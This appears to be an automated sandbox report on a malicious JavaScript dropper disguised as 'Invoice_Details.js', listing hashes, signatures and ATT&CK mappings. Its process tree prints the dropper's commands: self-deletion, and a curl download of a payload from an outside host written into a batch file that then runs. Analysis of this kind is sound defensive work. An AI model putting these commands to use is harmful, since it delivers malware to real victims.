4a44bf781e5ddd0a77dcaa97caafb1be31392fa6fc63891ff7e595318030b540

Analysis

max time kernel
119s
max time network
121s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
18-07-2023 16:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Invoice_Details.js
Size

42KB
MD5

22067f54377e90dc3fdd5f384c1fe3ee
SHA1

56b2afbc94b67f1c1f5e0a2340e25ca066b9baad
SHA256

5e5722af27fc7ae05a9f9705ce1d680fec5fef27a67019c37e2bd768c8e7c07e
SHA512

af74c25ae0cc74316411d129d7c0a13e81efe0b0cbb207c1e45e323288364b36d1b2d383af5161efb3a7c491494b67bfee90ec8c97420a956b623eb4f12bfe56
SSDEEP

384:kac3is6ZeUS1ogXzxmOP0U4OmB/P9rVOKeHBYH8Ffu+wtizOdKUmJYgqEq4SjoaM:/7ylm9FgH1gTP5C1XfW51TJfmh1EE

Score

7^/10

Malware Config

Signatures

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

2380 cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2380	cmd.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

wscript.exe

description	pid	process	target process
PID 2780 wrote to memory of 2380	2780	wscript.exe	cmd.exe
PID 2780 wrote to memory of 2380	2780	wscript.exe	cmd.exe
PID 2780 wrote to memory of 2380	2780	wscript.exe	cmd.exe
PID 2780 wrote to memory of 2844	2780	wscript.exe	cmd.exe
PID 2780 wrote to memory of 2844	2780	wscript.exe	cmd.exe
PID 2780 wrote to memory of 2844	2780	wscript.exe	cmd.exe
PID 2780 wrote to memory of 2900	2780	wscript.exe	cmd.exe
PID 2780 wrote to memory of 2900	2780	wscript.exe	cmd.exe
PID 2780 wrote to memory of 2900	2780	wscript.exe	cmd.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Invoice_Details.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2780

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\Invoice_Details.js"
2⤵
- Deletes itself
PID:2380

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo curl http://cajaminoretino.site/signed/3939.7z --output "C:\Users\Admin\AppData\Local\Temp\magnam.t" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\explicabo.m.bat"
2⤵
PID:2844

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\explicabo.m.bat"
2⤵
PID:2900

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\explicabo.m.bat
Filesize
141B

MD5
81645f19426feb8cef198e042710cf15

SHA1
864554e97313c0d6c8e38008ebf92c6a215ac56f

SHA256
2e57a524f3da47467fc1abce82df02f2f4b16406480dadf2d48e7d992b89aba0

SHA512
61b9a948b472ddc5d70884bc41f944fa760ca8628d64d768cf13d33c3f54610c693b0d9a6f12b31e9bcfebac5691c8365bb7f8740ec6b589e2955efe3063c5e5

Download Submit